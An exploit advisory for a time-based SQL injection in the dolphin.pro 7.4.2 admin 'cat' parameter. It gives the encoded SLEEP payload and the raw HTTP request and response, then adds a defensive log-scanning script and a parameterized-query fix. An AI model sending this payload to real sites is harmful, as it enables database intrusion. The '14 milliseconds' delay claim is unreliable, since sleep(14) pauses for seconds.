# Exploit Title: SQL Injection in Admin Functionality - dolphin.pro v7.4.2
# Date: 03/2025
# Exploit Author: Andrey Stoykov
# Version: 7.4.2
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/2025/03/friday-fun-pentest-series-21-sql.html
SQL Injection in Admin Functionality:
Steps to Reproduce:
1. Log in as an admin user and visit the page "http://192.168.58.170/dolphinCMS/administration/index.php?cat="
2. Add the MySQL injection SLEEP payload to the "cat" value:
%27%20and%20(select*from(select(sleep(14)))a)--%20
3. Notice that the backend delays the HTTP response for 14 milliseconds
// HTTP GET Request
GET /dolphinCMS/administration/index.php?cat=%27%20and%20(select*from(select(sleep(14)))a)--%20 HTTP/1.1
Host: 192.168.58.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
[...]
// HTTP Response
HTTP/1.1 200 OK
Date: Thu, 20 Mar 2025 22:55:46 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 55510
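
Detection sketch for the request shown above, as an added example that is not part of the original advisory or of the Dolphin code base: it scans web-server access logs for "cat" values on the admin page that carry quote, comment, subselect or time-delay markers, including double-encoded variants. The log lines, client addresses, the "settings" value and the indicator patterns are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ADMIN_PATH = "/administration/index.php"  # admin page named in the advisory
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
INDICATORS = {  # assumed heuristics, tune for your environment
    "quote": re.compile(r"['\"]"),
    "sql_comment": re.compile(r"--(?:\s|$)|/\*"),
    "time_delay_call": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
}
# Constructed access-log lines (Apache common log format); clients are documentation IPs.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Mar/2025:22:55:32 +0000] "GET /dolphinCMS/administration/index.php?cat=%27%20and%20(select*from(select(sleep(14)))a)--%20 HTTP/1.1" 200 55510',
    '192.0.2.11 - - [20/Mar/2025:22:56:01 +0000] "GET /dolphinCMS/administration/index.php?cat=settings HTTP/1.1" 200 41200',
    '192.0.2.12 - - [20/Mar/2025:22:57:10 +0000] "GET /dolphinCMS/administration/index.php?cat=x%2527%2520and%2520sleep(5)--%2520 HTTP/1.1" 200 55510',
    '192.0.2.13 - - [20/Mar/2025:22:58:44 +0000] "GET /dolphinCMS/index.php?cat=%27 HTTP/1.1" 200 1200',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %2527) so patterns see the final text."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def check_cat(value):
    """Return the names of the indicators found in one decoded "cat" value."""
    return [name for name, rx in INDICATORS.items() if rx.search(value)]

def scan(lines):
    """Return (client, decoded cat value, indicators) for suspicious admin requests."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        url = urlsplit(m.group(2)) if m else None
        if url is None or not url.path.endswith(ADMIN_PATH):
            continue  # unparsable line or a different page
        for raw in parse_qs(url.query, keep_blank_values=True).get("cat", []):
            value = fully_decode(raw)
            reasons = check_cat(value)
            if reasons:
                hits.append((m.group(1), value, reasons))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Pattern matching on logs only surfaces attempts; the fix belongs in the application, where the "cat" value should reach the database through a parameterized query.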